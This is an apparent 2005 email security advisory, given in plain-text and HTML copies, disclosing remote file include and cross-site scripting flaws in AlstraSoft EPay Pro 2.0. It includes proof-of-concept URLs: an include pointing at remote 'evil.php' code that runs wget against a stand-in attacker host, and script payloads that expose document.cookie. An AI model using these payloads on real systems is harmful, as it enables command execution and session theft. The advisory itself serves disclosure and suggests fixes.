AlstraSoft EPay Pro version 2.0 has file include and multiple cross site scripting flaws.
41a421339fefd9706dbe6b1928fe8c17fa15574d2aad1e7d5d18cba6fb06d018
This is a multi-part message in MIME format.
------=_NextPart_000_0012_01C53726.5C0BF6A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
[Hsc Security Group] https://www.hackerscenter.com/
[dP Security] https://digitalparadox.org/
Severity: High
Title: AlstraSoft EPay Pro v2.0 has file include and multiple xss =
vulnerabilities
Date: 02/04/2005
Vendor: AlstraSoft
Vendor Website: https://www.alstrasoft.com
Summary: Alstrasoft epay pro v2. has file include and multiple xss =
vulnerabilities.
Proof of Concept Exploits:=20
https://localhost/epal/index.php?view=3Dhttps://www.whatismyip.com?
File include vulnerability
Instead of www.whatismyip.com if we replaced that with suppose evil.php =
on www.server.com which contained evil code such as
<?
system('wget https://www.hacker.com");
?>
and we ran, =
https://localhost/epal/index.php?view=3Dhttps://www.server.com/evil it =
would execute the command and thus this can lead to arbitary command =
execution.
https://localhost/epal/?order_num=3Dcrap&payment=3D"><script>alert(documen=
t.cookie)</script>&send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexp=
ress
Pops cookie
https://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3D=
regular&send=3Dpriority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=
script%3E
Pops cookie
Possible Fixes: The usage of htmlspeacialchars(), and using a base =
directory for file include would solve these problems.
Keep your self updated, Rss feed at: https://digitalparadox.org/rss.ah
Author:=20
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
https://www.hackerscenter.com or https://digitalparadox.org/. Lookout for =
my soon to come out book on Secure coding with php.
Diabolic Crab's Security Services: Contact at =
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web =
application securing services, along with programming in php, vb, asp, =
c, c++, perl, java, html and graphic designing.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd
vW9dOgM7AoFDa/JaMgMjaisw
=3Dsb0J
-----END PGP SIGNATURE-----
------=_NextPart_000_0012_01C53726.5C0BF6A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =
Security Group]=20
<A =
href=3D"https://www.hackerscenter.com/">https://www.hackerscenter.com/</A><=
BR>[dP=20
Security] <A=20
href=3D"https://digitalparadox.org/">https://digitalparadox.org/</A></FONT>=
</DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: AlstraSoft =
EPay Pro v2.0=20
has file include and multiple xss vulnerabilities<BR>Date:=20
02/04/2005</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: AlstraSoft<BR>Vendor Website: =
<A=20
href=3D"https://www.alstrasoft.com">https://www.alstrasoft.com</A><BR>Summa=
ry:=20
Alstrasoft epay pro v2. has file include and multiple xss=20
vulnerabilities.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"https://localhost/epal/index.php?view=3Dhttps://www.whatismyip.com"=
>https://localhost/epal/index.php?view=3Dhttps://www.whatismyip.com</A>?<BR=
>File=20
include vulnerability</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Instead of <A=20
href=3D"https://www.whatismyip.com">www.whatismyip.com</A> if we replaced =
that with=20
suppose evil.php on <A href=3D"https://www.server.com">www.server.com</A> =
which=20
contained evil code such as<BR><?<BR>system('wget <A=20
href=3D"https://www.hacker.com">https://www.hacker.com</A>");<BR>?><BR>a=
nd we=20
ran, <A=20
href=3D"https://localhost/epal/index.php?view=3Dhttps://www.server.com/evil=
">https://localhost/epal/index.php?view=3Dhttps://www.server.com/evil</A>=20
it would execute the command and thus this can lead to arbitary command=20
execution.</FONT></DIV>
<DIV> </DIV><FONT face=3DArial size=3D2>
<DIV><BR><A=20
href=3D'https://localhost/epal/?order_num=3Dcrap&payment=3D"><script>a=
lert(document.cookie)</script>&send=3Dfirst&send=3Dregular&se=
nd=3Dpriority&send=3Dexpress'>https://localhost/epal/?order_num=3Dcrap=
&payment=3D"><script>alert(document.cookie)</script>&a=
mp;send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexpress=
</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"https://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&se=
nd=3Dfirst&send=3Dregular&send=3Dpriority&send=3D'%3E%3Cscrip=
t%3Ealert(document.cookie)%3C/script%3E">https://localhost/epal/?order_num=
=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3Dregular&send=3D=
priority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</=
A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(), and using a =
base=20
directory for file include would solve these problems.</DIV>
<DIV> </DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"https://digitalparadox.org/rss.ah">https://digitalparadox.org/rss.a=
h</A></DIV>
<DIV> </DIV>
<DIV>Author: <BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"https://www.hackerscenter.com">https://www.hackerscenter.com</A> =
or <A=20
href=3D"https://digitalparadox.org/">https://digitalparadox.org/</A>. =
Lookout for my=20
soon to come out book on Secure coding with php.</DIV>
<DIV> </DIV>
<DIV>Diabolic Crab's Security Services: Contact at=20
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20
application securing services, along with programming in php, vb, asp, =
c, c++,=20
perl, java, html and graphic designing.</DIV>
<DIV> </DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"https://www.pgp.com">www.pgp.com</A></DIV>
<DIV> </DIV>
<DIV>iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd<BR>=
vW9dOgM7AoFDa/JaMgMjaisw<BR>=3Dsb0J<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>
------=_NextPart_000_0012_01C53726.5C0BF6A0--